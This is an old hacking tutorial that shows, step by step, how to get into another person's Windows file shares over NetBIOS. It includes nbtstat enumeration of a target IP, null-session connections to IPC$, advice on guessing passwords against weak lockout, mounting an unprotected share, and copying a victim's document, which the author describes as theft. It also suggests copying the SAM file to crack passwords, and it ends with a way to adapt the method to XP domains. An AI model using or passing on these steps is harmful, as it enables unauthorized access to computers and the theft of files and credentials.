Madirish Tutorial 09
C:\>nbtstat -A 215.25.200.152 Local Area Connection 2: Node IpAddress: [0.0.0.0] Scope Id: [] Host not found. Local Area Connection: Node IpAddress: [215.25.200.135] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NCARTER <00> UNIQUE Registered SVNET <00> GROUP Registered NCARTER <20> UNIQUE Registered SVNET <1E> GROUP Registered NCARTER <03> UNIQUE Registered NCARTER <1F> UNIQUE Registered MAC Address = 00-00-E8-9A-9E-12 \Device\NetBT_Tcpip_{7CD42A51-8B2F-4A5F-A42E-1C76F336D3DE}: Node IpAddress: [215.25.200.140] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NCARTER <00> UNIQUE Registered SVNET <00> GROUP Registered NCARTER <20> UNIQUE Registered SVNET <1E> GROUP Registered NCARTER <03> UNIQUE Registered NCARTER <1F> UNIQUE Registered MAC Address = 00-00-E8-9A-9E-12
Using this command I have found that the username on this computer is NCARTER, and the workgroup is SVNET. Now the fun begins:
C:\>net use \\215.25.200.152\ipc$ /user:ncarter Local name Remote name \\215.25.200.152\ipc$ Resource type IPC Status OK # Opens 0 # Connections 1 The command completed successfully.
Ok, this is a bit simulated, usually you'll have to enter a password, but I got lucky here and there was no password in effect. If there had been a password you could issue 'net use \\215.25.200.152\ipc$ /user:ncarter PASSWORD' where PASSWORD = your guess as to thier password. Many systems will lock you out after 3 bad attempts, but you'd be surprised how many won't. What you're doing is trying to establish a null share connection.
C:\>net view \\215.25.200.152 Shared resources at \\215.25.200.152 Share name Type Used as Comment ------------------------------------------------------------------------------- HP COLOR Print MUSIC Disk PUBLIC Disk TOSEND Disk The command completed successfully.Ok, now we know the names of the shares on this computer. Lets try to connect to the 'TOSEND' share:
C:\>net use u: \\215.25.200.152\tosend The password is invalid for \\215.25.200.152\tosend. Type the password for \\215.25.200.152\tosend: System error 5 has occurred. Access is denied.
No dice, its password protected, lets try the others:
C:\>net use y: \\215.25.200.152\public The command completed successfully.
Bingo, we're in. Notice the y: in the 'net use' command? Thats the local drive name that we're going to use as a link to NCARTER.
C:\>net view \\215.25.200.152 Shared resources at \\215.25.200.152 Share name Type Used as Comment ------------------------------------------------------------------------------- HP COLOR Print MUSIC Disk PUBLIC Disk Y: TOSEND Disk The command completed successfully. C:\>dir y: Volume in drive Y is HP_PAVILION Volume Serial Number is 1C68-0F0A Directory of Y: 04/26/2000 12:56p <DIR> . 04/26/2000 12:56p <DIR> .. 04/26/2000 11:57a 331 Shortcut to Sawmill5.0.lnk 04/26/2000 12:58p 29,696 hits.doc 04/26/2000 01:33p 978,918 wtapi.pdf 04/26/2000 01:44p 19,456 USER TIMEOUT.doc 05/04/2000 02:34p 23,552 Letterhead.dot 11/15/2000 06:37p 20,480 Contact list.doc 07/24/2000 01:19p 87,040 Elegant Fax.doc 09/18/2000 12:38p 7,710,412 KingofPrussia000918.pdf 06/26/2000 04:28p <DIR> HP Drivers 09/18/2000 05:04p 15,906 cover.jpg 06/22/2000 12:33p <DIR> halflife update 06/02/2000 02:05p <DIR> School 09/06/2000 02:40p <DIR> abae 01/29/2000 05:33p <DIR> Content 04/27/2000 02:21p <DIR> photos 05/23/2000 01:22p <DIR> delete_button 03/01/2001 02:12p <DIR> Firewall Docs 06/20/2000 03:28p <DIR> Install 06/27/2000 10:26a <DIR> HomePage 07/12/2000 02:12p 463 Team Fortress Classic Manual.lnk 09/18/2000 10:54a 16,864,741 wtetrial.exe 10/26/2000 04:39p <DIR> Visor programs 11/29/2000 03:39p 26,112 TCS VS letter.doc 12 File(s) 25,777,107 bytes 13 Dir(s) 5,406,457,856 bytes free C:\>copy y:\hits.doc 1 file(s) copied. C:\>dir hits* Volume in drive C has no label. Volume Serial Number is 94B4-57C0 Directory of C: 04/26/2000 12:58p 29,696 hits.doc 1 File(s) 29,696 bytes 0 Dir(s) 2,796,068,864 bytes free
The rest of what I did should be pretty obvious. I stole a copy of hits.doc and moved it to my local C: drive. Notice how easy all of this was?!? If you're really lucky you'll get an NT machine and be able to copy the SAM database file and crack it to get a list of all the users AND their passwords. Enjoy
-------------------------------------------------------------------------------------------
The tutorial, unfortunately, describes the method to connect to Windows 98, Windows ME and Samba shares only. NT, 2000, and XP authenticate with a domain as well, so if you want to connect to an XP share you have to specify the domain in your username, for instance:
net use \\target.hostname.ext\ipc$ /USER:username@fulldomain.ext password
will allow you to connect to a null session on an XP machine. Its sort of a pain in the butt. To find your domain name you can either type
ipconfig /ALL
at the command line, or you can right click on your 'My Computer', select 'Properties' then click the 'Network Identification' tab.